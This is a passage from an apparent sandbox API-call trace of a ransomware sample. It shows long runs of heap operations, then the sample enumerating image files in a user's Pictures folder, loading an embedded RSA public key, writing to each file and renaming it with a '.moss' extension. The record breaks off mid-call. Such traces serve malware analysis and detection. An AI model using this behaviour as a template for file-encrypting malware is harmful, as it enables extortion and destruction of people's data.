lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.447] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.450] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.450] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.450] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.450] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.450] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45f30 [0172.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\") returned="YD0LTf1VnnELtRyQ6\\" [0172.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\") returned="js4wnFUoxs42X9Y0mylB\\" [0172.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0172.450] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.450] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.450] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.450] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.450] PathFindFileNameW (pszPath="") returned="" [0172.450] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd36f240, ftCreationTime.dwHighDateTime=0x1d5e0a8, ftLastAccessTime.dwLowDateTime=0xf3793300, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xf3793300, ftLastWriteTime.dwHighDateTime=0x1d5e3e5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.450] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0172.450] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd36f240, ftCreationTime.dwHighDateTime=0x1d5e0a8, ftLastAccessTime.dwLowDateTime=0xf3793300, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xf3793300, ftLastWriteTime.dwHighDateTime=0x1d5e3e5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.450] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2441270, ftCreationTime.dwHighDateTime=0x1d5e53f, ftLastAccessTime.dwLowDateTime=0x18ea4600, ftLastAccessTime.dwHighDateTime=0x1d5e2a7, ftLastWriteTime.dwLowDateTime=0x18ea4600, ftLastWriteTime.dwHighDateTime=0x1d5e2a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C v_S8 I6B", cAlternateFileName="CV_S8I~1")) returned 1 [0172.450] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\gRg1W2LdYa9ZK4JvYbH.png") returned=".png" [0172.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\gRg1W2LdYa9ZK4JvYbH.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\grg1w2ldya9zk4jvybh.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.451] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=3433) returned 1 [0172.451] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.454] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd43, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.455] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.456] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xd69, lpOverlapped=0x0) returned 1 [0172.456] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.456] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.457] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.457] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.457] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.457] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.457] GetLastError () returned 0x0 [0172.457] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.457] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.457] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.457] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.457] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.457] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.457] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.458] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.458] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.458] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.458] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.458] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\gRg1W2LdYa9ZK4JvYbH.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\grg1w2ldya9zk4jvybh.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\gRg1W2LdYa9ZK4JvYbH.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\grg1w2ldya9zk4jvybh.png.moss")) returned 1 [0172.459] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.459] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.459] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.460] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.460] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65515bb0, ftCreationTime.dwHighDateTime=0x1d5d941, ftLastAccessTime.dwLowDateTime=0xb78d9b60, ftLastAccessTime.dwHighDateTime=0x1d5df7b, ftLastWriteTime.dwLowDateTime=0xb78d9b60, ftLastWriteTime.dwHighDateTime=0x1d5df7b, nFileSizeHigh=0x0, nFileSizeLow=0x5f6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qR-9Frj44s4GyTq.png", cAlternateFileName="QR-9FR~1.PNG")) returned 1 [0172.460] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\qR-9Frj44s4GyTq.png") returned=".png" [0172.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\qR-9Frj44s4GyTq.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\qr-9frj44s4gytq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.460] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=24428) returned 1 [0172.460] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.463] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.464] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.465] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x5f6c, lpOverlapped=0x0) returned 1 [0172.465] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.465] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0172.466] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.466] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.466] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.466] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.466] GetLastError () returned 0x0 [0172.466] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.466] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0172.466] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.466] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.466] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.466] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.466] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.467] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.467] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.467] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.467] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.467] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\qR-9Frj44s4GyTq.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\qr-9frj44s4gytq.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\qR-9Frj44s4GyTq.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\qr-9frj44s4gytq.png.moss")) returned 1 [0172.468] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.468] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.468] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.469] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c21330, ftCreationTime.dwHighDateTime=0x1d5d8b0, ftLastAccessTime.dwLowDateTime=0x7196f950, ftLastAccessTime.dwHighDateTime=0x1d5e7ee, ftLastWriteTime.dwLowDateTime=0x7196f950, ftLastWriteTime.dwHighDateTime=0x1d5e7ee, nFileSizeHigh=0x0, nFileSizeLow=0xc360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qVaGkynXjPMz6RZ0K.bmp", cAlternateFileName="QVAGKY~1.BMP")) returned 1 [0172.469] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\qVaGkynXjPMz6RZ0K.bmp") returned=".bmp" [0172.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\qVaGkynXjPMz6RZ0K.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\qvagkynxjpmz6rz0k.bmp"), dwDesiredAccess=0xc0000000, 